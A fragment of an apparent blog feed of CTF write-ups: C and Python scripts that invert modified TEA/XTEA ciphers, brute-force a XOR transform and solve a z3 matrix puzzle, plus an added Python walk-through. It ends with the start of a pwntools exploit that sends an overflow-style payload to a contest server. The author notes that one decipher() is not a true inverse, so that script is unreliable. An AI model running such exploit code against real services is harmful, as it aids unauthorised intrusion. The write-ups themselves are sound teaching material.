class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>], <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> key[<span class="hljs-number">4</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i;<br> <span class="hljs-type">uint32_t</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], delta = <span class="hljs-number">0x31415927</span>, sum = delta * num_rounds;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br> sum -= delta; <span class="hljs-comment">/* step back first: same sum value the matching encrypt round used */</span><br> v0 -= (((v1 << <span class="hljs-number">4</span>) ^ (v1 >> <span class="hljs-number">5</span>)) + v1) ^ (sum + key[(sum & <span class="hljs-number">3</span>)]);<br> v1 -= (((v0 << <span class="hljs-number">4</span>) ^ (v0 >> <span class="hljs-number">5</span>)) + v0) ^ ((sum + key[((sum >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)]) ^ sum);<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"decrypted: %u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">38</span>] = { <span class="hljs-number">0x9AF9464B</span>, <span class="hljs-number">0xC417B89E</span>, <span class="hljs-number">0xB217A713</span>, <span class="hljs-number">0xC93BA9E8</span>, <span class="hljs-number">0x94F3E44E</span>, <span class="hljs-number">0xB5CC2AB5</span>, <span class="hljs-number">0x4451E42C</span>, <span class="hljs-number">0x7A8A289A</span>,<br> <span class="hljs-number">0x53C8D008</span>, <span 
class="hljs-number">0x6E117B49</span>, <span class="hljs-number">0x9BFFD794</span>, <span class="hljs-number">0x5EFF2DF9</span>, <span class="hljs-number">0x17E72531</span>, <span class="hljs-number">0xDFBD9979</span>, <span class="hljs-number">0x8F871B3A</span>, <span class="hljs-number">0x73E8C5AC</span>,<br> <span class="hljs-number">0xB28670A6</span>, <span class="hljs-number">0x5AF6A369</span>, <span class="hljs-number">0x2CF7DA24</span>, <span class="hljs-number">0x347B66AF</span>, <span class="hljs-number">0xB9C84D60</span>, <span class="hljs-number">0x911E912F</span>, <span class="hljs-number">0xBD5A2F9B</span>, <span class="hljs-number">0xCB96733A</span>,<br> <span class="hljs-number">0xC59968BE</span>, <span class="hljs-number">0xA00013E9</span>, <span class="hljs-number">0xC12F4EA4</span>, <span class="hljs-number">0xDE863A10</span>, <span class="hljs-number">0xA0C4D594</span>, <span class="hljs-number">0x4380983C</span>, <span class="hljs-number">0x7E2F7648</span>, <span class="hljs-number">0xE54DDC89</span>,<br> <span class="hljs-number">0x3F27A690</span>, <span class="hljs-number">0xB58D3199</span>, <span class="hljs-number">0x604AE517</span>, <span class="hljs-number">0x9C903984</span>, <span class="hljs-number">0xF4E04481</span>, <span class="hljs-number">0x3CF4EDFF</span> };<br> <span class="hljs-type">uint32_t</span> flag[<span class="hljs-number">2</span>] = {<span class="hljs-number">0x0</span>,<span class="hljs-number">0x0</span>};<br> <span class="hljs-type">uint32_t</span> pqw[<span class="hljs-number">2</span>] = { <span class="hljs-string">'S'</span>,<span class="hljs-string">'}'</span>};<br> <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> k[<span class="hljs-number">4</span>] = { <span class="hljs-number">0x00000020</span>, <span class="hljs-number">0x0000001B</span>, <span class="hljs-number">0x00000027</span>, <span class="hljs-number">0x0000002C</span> };<br> <span class="hljs-type">unsigned</span> <span 
class="hljs-type">int</span> i,r = <span class="hljs-number">54</span>;<span class="hljs-comment">// num_rounds: standard XTEA uses 32, this binary runs 54</span><br> <span class="hljs-comment">// v: the data to encrypt, two 32-bit unsigned integers per block</span><br> <span class="hljs-comment">// k: the key for encryption and decryption, four 32-bit unsigned integers (128 bits)</span><br> <span class="hljs-comment">//printf("plaintext: %u %u\n", v[0],v[1]);</span><br> <span class="hljs-comment">//encipher(r, v, k);</span><br> <span class="hljs-comment">//printf("encrypted: %u %u\n", v[0], v[1]);</span><br> encipher(r, pqw, k);<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span class="hljs-number">38</span>; i+=<span class="hljs-number">2</span>)<br> {<br> flag[<span class="hljs-number">0</span>] = v[i];<br> flag[<span class="hljs-number">1</span>] = v[i + <span class="hljs-number">1</span>];<br> decipher(r, flag, k);<br><br> }<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><p>Tested: pasting the round body straight from the IDA decompilation, as below, works just as well (it is the same arithmetic with the shift written as a multiply by 16).</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br>v1 += sum ^ (*(key + <span class="hljs-number">1</span> * ((sum >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)) + sum) ^ (v0 + ((v0 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v0)));<br>v0 += (*(key + <span class="hljs-number">1</span> * (sum & <span class="hljs-number">3</span>)) + sum) ^ (v1 + ((v1 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v1)));<br>sum += <span class="hljs-number">0x31415927</span>;<br>}<br>v[<span 
class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"encrypted: %u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br></code></pre></td></tr></table></figure><h2 id="浪漫至死不渝"><a href="#浪漫至死不渝" class="headerlink" title="浪漫至死不渝"></a>浪漫至死不渝</h2><p>The ciphertext and the key are both known, so a byte-by-byte brute force over the printable range is enough: re-apply the binary's per-byte transform to each candidate and keep the ones that reproduce the ciphertext byte.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><string.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> enc[]={ <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, 
<span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, <span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span> };<br> <span class="hljs-type">int</span> key[] = { <span class="hljs-string">'5'</span>,<span class="hljs-string">'2'</span>,<span class="hljs-string">'0'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'3'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'4'</span>,<span class="hljs-string">'W'</span>,<span class="hljs-string">'X'</span>,<span class="hljs-string">'H'</span>,<span class="hljs-string">'N'</span> };<br> <span class="hljs-type">int</span> i, j, k;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">14</span>; i < <span class="hljs-number">18</span>; i++)<br> {<br> <span class="hljs-keyword">for</span> (j = <span class="hljs-number">33</span>; j < <span class="hljs-number">126</span>; j++)<br> {<br> k = j;<br> k = j ^ key[i - <span class="hljs-number">7</span>];<br> k += <span class="hljs-number">99</span>;<br> <span class="hljs-keyword">if</span> (k == enc[i])<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c "</span>, j);<br> }<br> }<br> }<br><br><br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><string.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> enc[]={ <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, <span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, <span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span> };<br> <span class="hljs-type">int</span> key[] = { <span 
class="hljs-string">'5'</span>,<span class="hljs-string">'2'</span>,<span class="hljs-string">'0'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'3'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'4'</span>,<span class="hljs-string">'W'</span>,<span class="hljs-string">'X'</span>,<span class="hljs-string">'H'</span>,<span class="hljs-string">'N'</span> };<br> <span class="hljs-type">int</span> i, j, k;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span class="hljs-number">14</span>; i++)<br> {<br> <span class="hljs-keyword">for</span> (j = <span class="hljs-number">33</span>; j < <span class="hljs-number">126</span>; j++)<br> {<br> k = j;<br> k = j ^ key[i % <span class="hljs-number">7</span>]; <span class="hljs-comment">// re-apply the binary's transform to candidate j</span><br> k += <span class="hljs-number">10</span>;<br> <span class="hljs-keyword">if</span> (k == enc[i])<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c "</span>, j);<br> }<br> }<br> }<br><br><br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><h2 id="easymath"><a href="#easymath" class="headerlink" title="easymath"></a>easymath</h2><p>Could not make any progress on this one.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> z3 <span class="hljs-keyword">import</span> * <br><br>solver = Solver()<br><br>charset = <span class="hljs-string">"01234_asdzxcpoityumnbAOZWXGMY"</span><br><br>flag = [BitVec(<span class="hljs-string">'f%d'</span>%i, <span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">26</span>)]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">26</span>):<br> solver.add(Or([flag[i] == <span class="hljs-built_in">ord</span>(c) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> charset]))<br> <br>matrix = [<span class="hljs-number">0x12</span>, <span class="hljs-number">0x1D</span>, <span class="hljs-number">0x10</span>, <span class="hljs-number">0x13</span>, <span class="hljs-number">0x1B</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x17</span>, <span class="hljs-number">0x1E</span>, <span class="hljs-number">0x1D</span>, <span 
class="hljs-number">0x03</span>, <span class="hljs-number">0x1C</span>, <span class="hljs-number">0x0A</span>, <span class="hljs-number">0x15</span>, <span class="hljs-number">0x12</span>, <span class="hljs-number">0x1D</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x10</span>, <span class="hljs-number">0x1C</span>, <span class="hljs-number">0x0B</span>, <span class="hljs-number">0x1E</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x14</span>, <span class="hljs-number">0x07</span>]<br><br>v7 = [[BitVecVal(<span class="hljs-number">0</span>, <span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>)] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>)]  <span class="hljs-comment"># accumulators must start at 0: with free BitVec symbols here the constraints below never touch flag</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> v7[i][j] = v7[i][j] + flag[<span class="hljs-number">5</span>*i+k] * matrix[<span class="hljs-number">5</span>*k+j]<br> v7[i][j] = v7[i][j] & <span class="hljs-number">0x1F</span><br><br><span class="hljs-comment"># diagonal entries must equal 1</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> solver.add(v7[i][i] == <span class="hljs-number">1</span>)<br> <br><span class="hljs-comment"># off-diagonal entries must equal 0</span><br><span class="hljs-keyword">for</span> i <span 
class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">if</span> i != j:<br> solver.add(v7[i][j] == <span class="hljs-number">0</span>)<br><br><span class="hljs-comment"># specific bytes fixed to the required values (they pick between charset characters with the same low five bits)</span><br>solver.add(flag[<span class="hljs-number">1</span>] == <span class="hljs-built_in">ord</span>(<span class="hljs-string">'t'</span>))<br>solver.add(flag[<span class="hljs-number">7</span>] == <span class="hljs-built_in">ord</span>(<span class="hljs-string">'y'</span>)) <br>solver.add(flag[<span class="hljs-number">17</span>] == <span class="hljs-built_in">ord</span>(<span class="hljs-string">'y'</span>))<br><br><span class="hljs-keyword">if</span> solver.check() == sat:<br> m = solver.model()<br> res = []<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">26</span>):<br> res.append(m[flag[i]].as_long())<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">bytes</span>(res).decode())<br><span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"No solution found"</span>)<br></code></pre></td></tr></table></figure><h2 id="mySelf"><a href="#mySelf" class="headerlink" title="mySelf"></a>mySelf</h2><p>Mirror its algorithm and transcribe it. The binary starts with SMC (self-modifying code), which has to be bypassed first so the real function can be recovered. One caveat when reusing the script below: as written, decipher() is not the inverse of the encipher() above it. It subtracts the +4/+3 term from v1 and the +2/+2 term from v0, i.e. it inverts the cipher with the roles of v0 and v1 swapped relative to encipher(); check which ordering the binary actually uses before trusting either function.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><br><span class="hljs-comment">/* take 64 bits of data in v[0] and v[1] and 128 bits of key[0] - key[3] */</span><br><br><span class="hljs-type">void</span> <span class="hljs-title function_">encipher</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span 
class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i;<br> <span class="hljs-type">uint32_t</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], sum = <span class="hljs-number">0</span>, delta = <span class="hljs-number">1640531527</span>;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br> sum -= <span class="hljs-number">1640531527</span>; <span class="hljs-comment">/* 0x61C88647 = -0x9E3779B9: sum steps down, before the halves are updated */</span><br> v1 += ((v0 >> <span class="hljs-number">5</span>) + <span class="hljs-number">2</span>) ^ ((<span class="hljs-number">16</span> * v0) + <span class="hljs-number">2</span>) ^ (sum + v0);<br> v0 += ((v1 >> <span class="hljs-number">5</span>) + <span class="hljs-number">4</span>) ^ ((<span class="hljs-number">16</span> * v1) + <span class="hljs-number">3</span>) ^ (sum + v1);<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"encrypted: %u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">decipher</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], delta = <span class="hljs-number">1640531527</span>;<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i, sum = -(<span class="hljs-number">1640531527</span> * <span class="hljs-number">32</span>);<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span 
class="hljs-number">32</span>; i++) {<br> <span class="hljs-comment">/* NB: these two lines undo the +4/+3 term on v1 and the +2/+2 term on v0, the reverse of the pairing in encipher() above; verify the order against the binary */</span><br> v1 -= ((v0 >> <span class="hljs-number">5</span>) + <span class="hljs-number">4</span>) ^ ((<span class="hljs-number">16</span> * v0) + <span class="hljs-number">3</span>) ^ (sum + v0);<br> v0 -= ((v1 >> <span class="hljs-number">5</span>) + <span class="hljs-number">2</span>) ^ ((<span class="hljs-number">16</span> * v1) + <span class="hljs-number">2</span>) ^ (sum + v1);<br> sum += <span class="hljs-number">1640531527</span>;<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"decrypted: %x %x\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">8</span>] = { <span class="hljs-number">0xBDBDF9F0</span>, <span class="hljs-number">0xE26194C4</span>, <span class="hljs-number">0x80799125</span>, <span class="hljs-number">0x1F0FC219</span>, <span class="hljs-number">0xEB6A1815</span>, <span class="hljs-number">0x84F572C5</span>, <span class="hljs-number">0x40CC3A85</span>, <span class="hljs-number">0xD2A32ABB</span> };<br> <span class="hljs-type">uint32_t</span> flag[<span class="hljs-number">2</span>] = { <span class="hljs-number">0x0</span>,<span class="hljs-number">0x0</span> };<br> <span class="hljs-type">uint32_t</span> pqw[<span class="hljs-number">2</span>] = { <span class="hljs-string">'S'</span>,<span class="hljs-string">'Y'</span> };<br> <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> k[<span class="hljs-number">4</span>] = { <span class="hljs-number">0x00000020</span>, <span class="hljs-number">0x0000001B</span>, <span class="hljs-number">0x00000027</span>, <span class="hljs-number">0x0000002C</span> };<br> <span 
class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i, r = <span class="hljs-number">32</span>;<span class="hljs-comment">// num_rounds: 32, as in standard TEA</span><br> <span class="hljs-comment">// v: the data to encrypt, two 32-bit unsigned integers per block</span><br> <span class="hljs-comment">// k: key, four 32-bit unsigned integers (128 bits); unused by this keyless variant</span><br> <span class="hljs-comment">//printf("plaintext: %u %u\n", v[0],v[1]);</span><br> <span class="hljs-comment">//encipher(r, v, k);</span><br> <span class="hljs-comment">//printf("encrypted: %u %u\n", v[0], v[1]);</span><br> <br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span class="hljs-number">8</span>; i += <span class="hljs-number">2</span>)<br> {<br> flag[<span class="hljs-number">0</span>] = v[i];<br> flag[<span class="hljs-number">1</span>] = v[i + <span class="hljs-number">1</span>];<br> <span class="hljs-comment">// encipher(r, flag);</span><br> decipher(r, flag);<br><br> }<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c"</span>, <span class="hljs-number">2157182970</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure>]]></content>
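Added example, not code from the original writeup: the rule from pitfall four, worked through in Python on the modified XTEA above (delta 0x31415927, key words 0x20/0x1B/0x27/0x2C, 54 rounds, and the extra XOR with sum in the v1 half). decipher() starts sum at delta times the round count, steps it back before each round, and subtracts the two halves in the opposite order to encipher(); decipher_wrong_order() keeps the encryption order and shows that this is not an inverse. The same recipe inverts the keyless TEA variant in mySelf. Assumptions: the plaintext block in the usage line is constructed for the demonstration, and decrypt_blocks() assumes each 32-bit word holds the flag bytes little-endian.

```python
# Added example (not from the writeup): round trip for the modified XTEA.
# All 32-bit arithmetic is reduced mod M32; the shift-left-by-4 is written
# as *16 and the two-bit key index as % 4, which is equivalent for these operands.

M32 = 0x100000000                 # 2**32
DELTA = 0x31415927                # the challenge's delta (standard XTEA: 0x9E3779B9)
KEY = (0x20, 0x1B, 0x27, 0x2C)    # key words from the writeup
ROUNDS = 54                       # the binary runs 54 rounds, not the usual 32


def _mix(x):
    """The XTEA mixing term: ((x shifted left 4) ^ (x >> 5)) + x, mod 2**32."""
    return (((x * 16) % M32 ^ (x >> 5)) + x) % M32


def encipher(v, key=KEY, rounds=ROUNDS, delta=DELTA):
    """Encrypt one 64-bit block given as (v0, v1), mirroring the C encipher()."""
    v0, v1 = v
    s = 0
    for _ in range(rounds):
        # v1 half: key word picked by bits 11..12 of sum, then XORed with sum again
        v1 = (v1 + (_mix(v0) ^ ((s + key[(s >> 11) % 4]) % M32 ^ s))) % M32
        # v0 half: key word picked by the low two bits of sum
        v0 = (v0 + (_mix(v1) ^ ((s + key[s % 4]) % M32))) % M32
        s = (s + delta) % M32
    return (v0, v1)


def decipher(v, key=KEY, rounds=ROUNDS, delta=DELTA):
    """Inverse of encipher(): sum runs backwards, halves are subtracted, order reversed."""
    v0, v1 = v
    s = (delta * rounds) % M32
    for _ in range(rounds):
        s = (s - delta) % M32       # step sum back first so it matches the encrypt round
        v0 = (v0 - (_mix(v1) ^ ((s + key[s % 4]) % M32))) % M32
        v1 = (v1 - (_mix(v0) ^ ((s + key[(s >> 11) % 4]) % M32 ^ s))) % M32
    return (v0, v1)


def decipher_wrong_order(v, key=KEY, rounds=ROUNDS, delta=DELTA):
    """Pitfall: subtracting in the encryption order (v1 before v0) is NOT an inverse,
    because the v1 term has to be recomputed from the original v0."""
    v0, v1 = v
    s = (delta * rounds) % M32
    for _ in range(rounds):
        s = (s - delta) % M32
        v1 = (v1 - (_mix(v0) ^ ((s + key[(s >> 11) % 4]) % M32 ^ s))) % M32
        v0 = (v0 - (_mix(v1) ^ ((s + key[s % 4]) % M32))) % M32
    return (v0, v1)


def decrypt_blocks(words, key=KEY, rounds=ROUNDS):
    """Decrypt a list of 32-bit words two at a time; assumes little-endian flag bytes."""
    out = bytearray()
    for i in range(0, len(words) - 1, 2):
        v0, v1 = decipher((words[i], words[i + 1]), key, rounds)
        out += v0.to_bytes(4, "little") + v1.to_bytes(4, "little")
    return bytes(out)


if __name__ == "__main__":
    block = (ord("S"), ord("}"))       # constructed plaintext block
    ct = encipher(block)
    print(hex(ct[0]), hex(ct[1]), decipher(ct) == block, decipher_wrong_order(ct) == block)
```

Feed the writeup's 38-word v[] array to decrypt_blocks() to get all flag bytes in one call; if the result looks byte-swapped, the words were stored big-endian and the two to_bytes() calls need "big" instead.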
<summary type="html"><h4 id="PWN1"><a href="#PWN1" class="headerlink" title="PWN1"></a>PWN1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># p = process(&#x27;./ezshellcode&#x27;)</span><br>p = remote(<span class="hljs-string">&#x27;pwn.node.game.sycsec.com&#x27;</span>,<span class="hljs-number">30213</span>)<br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br>context.log_level = <span class="hljs-string">&#x27;DEBUG&#x27;</span><br><br><br><br>p.recvuntil(<span class="hljs-string">b&#x27;my heart&#x27;</span>)<br>p.sendline(<span class="hljs-string">b&#x27;aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaSyclover&#x27;</span>)<br><br>p.recvuntil(<span class="hljs-string">b&#x27;challege!&#x27;</span>)<br>p.recvline()<br>p.recvline()<br>a=p.recvline().decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>a = a[<span class="hljs-number">0</span>:-<span class="hljs-number">3</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-number">6666666666</span>)<br><span 
